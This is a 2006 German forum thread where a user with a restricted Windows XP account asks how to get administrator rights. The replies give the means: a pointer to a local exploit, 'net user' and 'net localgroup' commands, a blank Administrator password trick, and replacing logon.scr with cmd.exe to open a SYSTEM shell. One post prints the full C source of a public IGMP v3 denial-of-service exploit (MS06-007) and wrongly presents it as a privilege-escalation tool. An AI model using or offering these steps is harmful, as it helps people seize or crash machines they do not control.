#1 18. September 2006 Halle Leuz ich hab mal ne frage. Ich hab mal irgentwas gelesen, dass man sich, wenn man mit einem Eingeschränktem konto eingeloggt ist in Win Xp sich irgentwie über das cmd Admin rechte machen kann und admin auf dem pc sein. Ich finde nur leider das tut weder in google noch in rr. Wisst ihr wie das geht oder hat jemand ein tut? Für sinvolle Beiträge gibts gute Bewertung mfg Elron_McBong + Multi-Zitat Zitieren
#2 18. September 2006 AW: Win XP Benutzerkonten ja es gibt das "GetAd" local exploit... einfach mal nach googlen greez myth + Multi-Zitat Zitieren
#3 18. September 2006 AW: Win XP Benutzerkonten find ich net wirklich was ich hab gehört das das mit der cmd geht mit irgentwelchen befehlen + Multi-Zitat Zitieren
#4 18. September 2006 AW: Win XP Benutzerkonten hmm joa dieser "irgendein cmd-befehl" ist das exploit dass über die cmd gestartet wird. link: GetAd, NetDDE Exploit Code (WM_COPYDATA) allerdings musste ich gerade feststellen dass das unter xp nicht mehr funktioniert... sorry greez myth + Multi-Zitat Zitieren
#5 19. September 2006 AW: Win XP Benutzerkonten Haste es schon mal mit "net user Name Passwort /ad" (Name und PW selbst wählen) und danach "net localgroup Administrators Name /ad" (Hier musste den Namen angeben den Du oben auch angegeben hast) probiert? Weiss nicht ob es klappt aber einen versuch wäre es wert... Gruss + Multi-Zitat Zitieren
#6 20. September 2006 AW: Win XP Benutzerkonten es erstellt zwar neue konten aber ich bin nicht admin im neuen konto und kann es auch nicht als eingeschränkter nutzer machen + Multi-Zitat Zitieren
#7 20. September 2006 AW: Win XP Benutzerkonten also ich hab hier was von milw0rm geht bei allen XP+2003 (Xp geht auf jeden fall 2003 stehl mal drann) Code: #include <stdio.h> #include <winsock2.h> #pragma comment(lib, "Ws2_32.lib") typedef struct iphdr { unsigned char verlen; // IP version & length unsigned char tos; // Type of service unsigned short total_len; // Total length of the packet unsigned short ident; // Unique identifier unsigned short frag_and_flags; // Flags unsigned char ttl; // Time to live unsigned char proto; // Protocol (TCP, UDP etc) unsigned short checksum; // IP checksum unsigned int sourceIP; // Source IP unsigned int destIP; // Destination IP unsigned short options[2]; } IPHEADER; typedef struct igmphdr { unsigned char type; unsigned char code; unsigned short checksum; unsigned long group; unsigned char ResvSQVR; unsigned char QQIC; unsigned short num; unsigned long addes; } IGMPHEADER; USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(USHORT); } if (size) cksum += *(UCHAR*)buffer; cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } int sendIGMP(char* a, char* b) { unsigned int dst_addr, src_addr; IPHEADER ipHeader; IGMPHEADER igmpHeader; dst_addr=inet_addr (b); src_addr=inet_addr (a); char szSendBuf[60]={0}; int rect; WSADATA WSAData; if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0) return FALSE; SOCKET sock; if ((sock = WSASocket(AF_INET,SOCK_RAW, IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) { printf("Create socket error"); WSACleanup(); return FALSE; } BOOL flag=TRUE; if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { printf("Set options error"); closesocket(sock); WSACleanup(); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=htons(99); ssin.sin_addr.s_addr=dst_addr; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader)); ipHeader.ident=htons(0); ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_IGMP; ipHeader.checksum=0; ipHeader.tos=0; ipHeader.destIP=dst_addr; ipHeader.sourceIP=src_addr; //Ip options ipHeader.options[0]=htons(0x0000); //bug is here =) ipHeader.options[1]=htons(0x0000); igmpHeader.type=0x11; //v3 Membership Query igmpHeader.code=5; igmpHeader.num=htons(1); igmpHeader.ResvSQVR=0x0; igmpHeader.QQIC=0; igmpHeader.group=inet_addr("0.0.0.0"); igmpHeader.addes=dst_addr; igmpHeader.checksum=0; memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader)); igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4); ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader))); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin)); if (rect==SOCKET_ERROR) { printf("Send error: <%d>\n",WSAGetLastError()); closesocket(sock); WSACleanup(); return 0; } closesocket(sock); WSACleanup(); return 1; } main(int argc, char **argv) { if(argc<2) { printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n"); printf("Usage:\n"); printf("c:\\igmps.exe <target ip> <source ip>\n\n"); exit(0); } sendIGMP(argv[2], argv[1]); return 0; } also wenn du des in ne *.txt machst und dann exe dahinter schreibst musst nur en doppel klick machen dann gibts keine eingeschrenkten konten mehr und man kann auch keine mehr erstellen und da müsst auch noch en fehler von Xp kommen ich weis des mit der exe dahinter schreiben geht irgendwie anders aber ich bin nur en script kiddy MfG hackmanner + Multi-Zitat Zitieren
#8 20. September 2006 AW: Win XP Benutzerkonten ähm... 1. musste das compilen und kannst ned einfach txt => exe machen (script kiddie triffts genau -.-) und 2. IGMP v3 DoS Exploit (MS06-007) => wer weiss was DoS bedeutet kriegt nen keks -.- + Multi-Zitat Zitieren
#9 21. September 2006 AW: Win XP Benutzerkonten also ich bin noch auf der suche nach diesem Ausführen befehl.... aber auch nur weil ich weiß das es sowas mal gab bzw. gibt (glaub ich zumindest)^^ derweil kannst du auch noch versuchen: hat er kein admin passwort geht folgendes.... wenn der anmeldebildschirm kommt wo du die konnten auswählen kannst drücke 2 mal alt+strg+entf und gebe beim benutzer "Administrator" ein und lass das kennwort feld leer.... ein versuch is es wert^^ wenn ich den befehl gefunden habe (falls es ihn noch gibt) poste ich ihn... mfg + Multi-Zitat Zitieren
#10 21. September 2006 AW: Win XP Benutzerkonten ok hab den befehl gefunden... zumindes war es der befehl den ich von damals kenn.... ob´s geht? ka, versuch dein glück: "control userpasswords2" mfg + Multi-Zitat Zitieren
#11 21. September 2006 AW: Win XP Benutzerkonten jaja ich weis was dos is aber des mit dem txt->exe funzt des wegen lass ich des mit dem compiler warum extra was machen wenns doch geht (wenn du mir net glaubst dass des geht dann probiers halt mal aus) MfG hackmanner //:EDIT ich will ja net zu viel spamen des wegen edit ich des noch also ich hat mal aus probiert und des ging probiers halt auch aus ich hat ja geschrieben dass ich weis dass man des normal mim compiler machen muss + Multi-Zitat Zitieren
#12 21. September 2006 AW: Win XP Benutzerkonten Du bist also der festen Überzeugung, dass wenn ich Quelltext inne Textdatei haue und anstatt .txt einfach .exe dranschreibe, dass das ne ausführbare Datei wird ? LOOOOOL Compiler – Wikipedia + Multi-Zitat Zitieren
#13 22. September 2006 AW: Win XP Benutzerkonten Wenn du Rechte auf C:\ hast und Dateien löschen oder verändern kannst dann kopiere die Datei C:\Windows\System32\Logon.scr irgendwohin. Kopiere außerdem die datei C:\Windows\System32\cmd.exe irgendwoanders hin. Dann benennst du die cmd.exe in logon.scr um und ersetzt die bereits vorhandene datei unter C:\Windows\System32\ Danach stellst du (falls nicht schon auf Standard) den Windows Bildschirmschoner auf "Windows XP", meldest dich ab, wartest ne Weile beim Logon, und nachdem die Zeit fürn Bildschirmschoner abgelaufen ist, öffnet sich ne cmd mit vollen Admin Rechten. dann einfach wie schon geschrieben wurde mit "net user NAME PASSWORT /add" und "net localgroup Administratoren BENUTZERNAME /add" dir n Benutzer anlegen und zu Gruppe admins adden. So jetzt kannst dich mit dem Benutzer anmelden. Wahrscheinlich wirst jedoch keine ausreichenden Rechte auf C:\ haben um die logon.scr zu ersetzen. Ansonsten nach local Exploits suchen. + Multi-Zitat Zitieren